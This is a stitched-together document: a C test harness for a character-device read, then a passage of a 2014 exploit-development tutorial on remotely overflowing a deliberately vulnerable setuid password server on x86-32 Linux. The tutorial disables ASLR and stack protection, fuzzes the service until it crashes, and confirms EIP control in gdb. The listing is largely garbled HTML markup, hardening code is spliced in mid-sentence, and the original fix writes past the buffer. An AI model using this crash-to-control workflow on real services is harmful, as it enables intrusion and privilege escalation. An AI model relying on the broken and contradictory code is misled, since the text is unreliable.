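/* Hardened .read: never copies more than count bytes, includes the NUL when it
   fits, and reports how many bytes were actually transferred. */
long read_hardened(char *dst, size_t count)
{
    size_t avail = strlen(datastore) + 1;
    size_t n = avail < count ? avail : count;
    memcpy(dst, datastore, n);
    return (long)n;
}

/* One run of the test app: read, write arg, read again, each with
   count = strlen(arg) + 1 exactly as reverse-app.c does. buf plays the app's
   static 513-byte array and is zeroed first (a fresh process). Returns the
   "After:" string, or NULL if the app would have bailed out. */
const char *simulate_app(const char *arg, char *buf, int hardened)
{
    size_t count = strlen(arg) + 1;
    long n;
    if (count > DATA_SIZE)
        return NULL;                 /* the app's own "String too long" check */
    memset(buf, 0, DATA_SIZE + 1);
    n = hardened ? read_hardened(buf, count) : read_as_observed(buf, count);
    if (n < 0)
        return NULL;
    if (hardened)
        buf[n] = '\0';               /* a careful app terminates at the returned length */
    if (model_write(arg, count) < 0)
        return NULL;
    n = hardened ? read_hardened(buf, count) : read_as_observed(buf, count);
    if (n < 0)
        return NULL;
    if (hardened)
        buf[n] = '\0';
    return buf;
}

int main(void)
{
    static char buf[DATA_SIZE + 1];
    model_reset("I am testing my first character device");
    printf("observed: \"%s\"\n", simulate_app("Another test string", buf, 0));
    printf("observed: \"%s\"\n", simulate_app("Another test", buf, 0));
    model_reset("I am testing my first character device");
    printf("hardened: \"%s\"\n", simulate_app("Another test string", buf, 1));
    printf("hardened: \"%s\"\n", simulate_app("Another test", buf, 1));
    return 0;
}
```

Run stand-alone it prints the transcript's "string test Anotherst character device" and "test AnotherAnother" for the observed handler, and clean "string test Another" / "test Another" once the read honours count and the app terminates at the returned length. Note that with the hardened read the first "Before:" of a run is truncated to the 20 bytes the app asked for, which is correct: a short read is the caller's problem to loop over, not the driver's excuse to write past the buffer.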

Remote Exploitation

12 June 2014 at 21:59
By: 0xe7
This is the third part in our series on exploit research on x86-32 Linux systems. Part 1 (/x86-32-linux/2014/05/08/plain-buffer-overflow/) was an introduction to buffer overflows (http://en.wikipedia.org/wiki/Buffer_overflow) and part 2 (/x86-32-linux/2014/05/20/plain-format-string-vulnerability/) was an introduction to format string vulnerabilities (http://en.wikipedia.org/wiki/Uncontrolled_format_string).

Both of the previous posts targeted local applications. Here I will introduce remote exploitation and try to describe the differences between exploiting a local and a remote application while demonstrating remote exploitation.

The Vulnerable App

I've tried to keep the application as similar as possible to the one we used in parts 1 and 2; obviously some changes needed to be made:

```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <string.h>

#define PASS "topsecretpassword"
#define SFILE "secret.txt"
#define PORT 9999

void sendfile(int connfd, struct sockaddr_in cliaddr);
void senderror(int connfd, struct sockaddr_in cliaddr, char p[]);
int checkpass(char *p);

class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span 
class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" 
/spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan 
class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span 
class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan 
class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan 
class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan 
class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span 
class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main differences here are that the communication between the user and the application is done over a network, instead of via command line arguments, and that there is no format string vulnerability./p h3The Fix/h3 pThe vulnerability is in the same line as the a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"plain buffer overflow post/a in the codecheckpass/code function on line 82. This should be changed to codestrncpy(p, a, sizeof(p)-1);/code and explicitly insert the null character at the end codep[512] = '\0';/code./p h2Setting Up The Environment/h2 pThere are 3 main differences (and a few minor ones) when doing exploit development for remote applications. The first is pretty obvious, when doing exploit research it is impossible to develop an exploit on a target application which resides on a machine which you don't control./p pWhile its best not to develop an exploit on a target machine (because you want to be as quiet as possible so not to raise suspicion of the administrator), with local application attacks it is assumed that you already have access to the machine (otherwise you will not be able to attack it) so it is totally possible to do the development on the target machine providing the tools that you need are on there (ie. a debugger, disassembler, compiler...) or you have the means to install them./p pBut with a network application it is unlikely that you already have access to the machine and as we have seen in the first 2 parts of this series while you are developing the exploit you will need to restart the application numerous times. 
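Going back to The Fix above, the following is an added example (not code from the original post) of the two hardened pieces it describes: a bounded codecheckpass/code with the terminator at index 511, and a receive helper that asks for at most codesizeof(buf)-1/code bytes and handles the -1 return, replacing the coderecvfrom/code / codepwd[n] = '\0'/code pair in codemain/code. The names codecheckpass_fixed/code, codecheckpass_strict/code, coderecv_cstring/code, codecheckpass_fixed_on_As/code and codedemo_recv_cstring/code are mine; the socketpair harness and the runs of 'A' bytes are constructed test inputs standing in for a real client, so nothing here touches the network.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define PASS  "topsecretpassword"
#define PWBUF 512   /* same size as p[512] in the listing above */

/* Fixed checkpass: the copy length is taken from the destination and the
 * terminator is written to the last valid index (511), not to p[512]. */
int checkpass_fixed(const char *a)
{
    char p[PWBUF];
    strncpy(p, a, sizeof(p) - 1);
    p[sizeof(p) - 1] = '\0';
    return strcmp(p, PASS);
}

/* The copy was never needed: compare in place, and refuse anything that
 * would not have fitted the buffer so that over-long input fails closed.
 * Returns 0 on a match, 1 otherwise. */
int checkpass_strict(const char *a)
{
    if (strlen(a) >= PWBUF)
        return 1;
    return strcmp(a, PASS) != 0;
}

/* Receive at most bufsize-1 bytes and always leave buf NUL-terminated.
 * Replaces the listing's recvfrom(..., 1000, ...) / pwd[n] = '\0' pair,
 * which writes pwd[1000] on a full read and pwd[-1] when recvfrom fails.
 * Returns the payload length, or -1 on error. */
ssize_t recv_cstring(int fd, char *buf, size_t bufsize)
{
    ssize_t n;
    if (bufsize == 0)
        return -1;
    n = recv(fd, buf, bufsize - 1, 0);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';
    return n;
}

/* Run checkpass_fixed on a constructed input of `len` 'A' bytes (the shape
 * of input the fuzzer sends). Returns the checkpass result, -1 on OOM. */
int checkpass_fixed_on_As(size_t len)
{
    char *s = malloc(len + 1);
    int r;
    if (!s)
        return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    r = checkpass_fixed(s);
    free(s);
    return r;
}

/* Exercise recv_cstring over a local socketpair instead of a network peer:
 * push send_len 'A' bytes in one end and receive into a bufsize-byte buffer
 * at the other. Returns what recv_cstring reported, -3 if the terminator
 * did not land inside the buffer, or -2 if the harness itself failed. */
long demo_recv_cstring(size_t send_len, size_t bufsize)
{
    int sv[2];
    char *payload, *buf;
    long got = -2;

    if (send_len == 0 || bufsize == 0)
        return -2;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -2;
    payload = malloc(send_len);
    buf = malloc(bufsize);
    if (payload && buf) {
        memset(payload, 'A', send_len);
        if (write(sv[0], payload, send_len) == (ssize_t)send_len) {
            got = recv_cstring(sv[1], buf, bufsize);
            if (got >= 0 && ((size_t)got > bufsize - 1 || buf[got] != '\0'))
                got = -3;
        }
    }
    free(payload);
    free(buf);
    close(sv[0]);
    close(sv[1]);
    return got;
}

int main(void)
{
    printf("checkpass_fixed(PASS)      = %d\n", checkpass_fixed(PASS));
    printf("checkpass_fixed(600 x 'A') = %d\n", checkpass_fixed_on_As(600));
    printf("checkpass_strict(\"A\")      = %d\n", checkpass_strict("A"));
    printf("recv 1200 bytes into 1000  = %ld\n", demo_recv_cstring(1200, 1000));
    return 0;
}
```

The point of coderecv_cstring/code is that the size handed to coderecv/code is one less than the buffer, so the terminator always has a slot of its own; codedemo_recv_cstring(1200, 1000)/code therefore reports 999 bytes instead of letting the terminator land at index 1000 as the listing does.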
pFor this reason it is best to do thorough reconnaissance first and gather as much information as possible about the environment the application runs in (distribution and kernel, compiler and library versions, which mitigations are enabled), because you will then want to replicate that environment as closely as possible in your development environment./p
pThe more faithfully you replicate the real environment, the more likely the exploit is to succeed against the real target./p
pI will be using the same system and environment as before, but I will create a new user to run the application as:/p
precode
[email protected]:~# adduser appuser
Adding user `appuser' ...
Adding new group `appuser' (1002) ...
Adding new user `appuser' (1002) with group `appuser' ...
Creating home directory `/home/appuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n]
[email protected]:~# ls
app-net.c
[email protected]:~# gcc -z execstack -fno-stack-protector -o app-net app-net.c
[email protected]:~# cp app-net /home/appuser/
[email protected]:~# cat /proc/sys/kernel/randomize_va_space
2
[email protected]:~# echo 0 > /proc/sys/kernel/randomize_va_space
[email protected]:~# cat /proc/sys/kernel/randomize_va_space
0
[email protected]:/home/appuser# ls -l
total 8
-rwxr-xr-x 1 root root 7824 Jun 15 13:48 app-net
[email protected]:/home/appuser# chmod u+s app-net 
[email protected]:/home/appuser# ls -l
total 8
-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net
[email protected]:/home/appuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
[email protected]:/home/appuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt
[email protected]:/home/appuser# chmod 600 secret.txt
[email protected]:/home/appuser# ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
[email protected]:/home/appuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
[email protected]:/home/appuser# su - appuser
[email protected]:~$ ls -l
total 12
-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net
-rw------- 1 root root 91 May 5 09:51 secret.txt
[email protected]:~$ cat secret.txt 
cat: secret.txt: Permission denied
/code/pre
pSo this is the setup for my development environment: my attack and target machines are the same machine, and I will just be using separate user accounts. As in the earlier parts, the binary is built with an executable stack (code-z execstack/code) and without a stack protector (code-fno-stack-protector/code), and ASLR is switched off (coderandomize_va_space/code set to 0), so none of the modern mitigations are in play./p
pI will be attacking the application over the a href="http://www.tldp.org/LDP/nag/node66.html" target="_blank"loopback interface/a (127.0.0.1). The network you attack over is irrelevant to the technique; I am using the same machine and the loopback interface for simplicity and reliability./p
pThe application will be run as the user codeappuser/code. It again has the setuid bit set, because the file it sends when the correct password is received is only readable by root (which is why codelsof/code below shows the process as root). This also means we can elevate our privileges to root, as in the last two parts./p
pWe now need to run the application on the "server side":/p
precode
[email protected]:~$ ./app-net 
/code/pre
pThe server is now listening on port 9999:/p
precode
[email protected]:~# lsof | grep -i listen | grep 9999
app-net 18826 root 3u IPv4 191330 0t0 TCP *:9999 (LISTEN)
/code/pre
h2Testing The App/h2
pFirst we need to look at the output we should expect from a normal request:/p
precode
[email protected]:~$ echo -n "A" | nc 127.0.0.1 9999
Wrong password: A
/code/pre
pSo we get "Wrong password: " followed by our input. I am going to show you two ways to find the crash. The first is to write a fuzzer and launch it as before; we can use this Python script:/p
precode
#!/usr/bin/env python

import socket

for i in range(1, 5001):   # try lengths 1 to 5000; i is the length sent

    # create a TCP socket (AF_INET = IPv4, SOCK_STREAM = TCP)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # connect to the service on 127.0.0.1:9999
    s.connect(("127.0.0.1", 9999))

    # send "A" i times over the connection
    s.sendall(b"A" * i)

    # the server answers with three sendto() calls, so keep reading until
    # the trailing newline arrives or the connection is closed under us
    reply = b""
    while not reply.endswith(b"\n"):
        chunk = s.recv(2048)
        if not chunk:      # closed without a full reply: the server died
            break
        reply += chunk

    # close the socket
    s.close()

    # check the reply is exactly what a wrong password of this length gives
    if reply != b"Wrong password: " + b"A" * i + b"\n":

        # if not, stop: this is the length that broke the service
        break

# print the length we got to
print(i)
/code/pre
pRun the script:/p
precode
[email protected]:~$ python app-net-fuzz.py
528
/code/pre
pNow we have to verify how far it is until we overwrite EIP:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span
class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app-net/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 528#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? 
()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 530#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x000a4141 in ?? 
()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot; * 532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pSo the next 4 bytes after the first 528 bytes that we send overwrite EIP, lets use the second method to verify this./p pThe second method involves using a couple of tools that come with a href="https://en.wikipedia.org/wiki/Metasploit_Project" target="_blank"metasploit/a (codepattern_create.rb/code and codepattern_offset.rb/code). 
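Before running them it is worth seeing what those two tools actually do. The following is an added Python 3 example, not code from the original post and not Metasploit's own code: it generates the same cyclic pattern (uppercase letter, lowercase letter, digit, with the digit changing fastest) and maps a crash EIP back to an offset, taking the little-endian byte order into account. The crash value the run below produces, 0x41367241, maps to 528 with it, the same answer `pattern_offset.rb` gives. The third helper mirrors the manual check above: it counts how many of the low bytes of a crash value are our 0x41 marker, which is how 0x000a4141 reads as "two of our bytes reached EIP".

```python
#!/usr/bin/env python3
"""Added example: what pattern_create.rb / pattern_offset.rb do, in Python 3.
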